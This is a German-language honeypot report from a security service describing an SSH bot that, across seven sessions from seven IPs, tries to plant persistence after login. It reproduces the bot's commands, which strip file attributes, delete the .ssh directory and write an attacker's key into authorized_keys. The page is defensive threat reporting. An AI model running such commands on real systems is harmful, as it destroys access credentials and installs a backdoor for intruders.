ALLSmartSecurity
Angriffsfall

Einnisten nach Login: 7 Sitzungen von 7 IPs, „cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-r“

29.09.2026 · Einnisten nach Login · 8 Anfragen · Dauer keine Angabe · Volksrepublik China

Überblick

Klassifizierung
Einnisten nach Login
Angriffsmuster
shell_session, Persistenz
Herkunft
Volksrepublik China · TOTAL PLAY TELECOMUNICACIONES SA DE CV

7 verschiedene Sitzungen (8 Durchlaeufe) von 7 IPs, Laender: CN (3), US (2), MX (1). Dienst: ssh/22. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.

Erkannte Signaturen

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
bash: lockr: command not found
root@srv01:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa [Token]
bash: .ssh/authorized_keys: No such file or directory

Ablauf

(2 von 8, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sCMDcd ~; chattr -ia .ssh; lockr -ia .ssh
+0 sCMDcd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa [Token]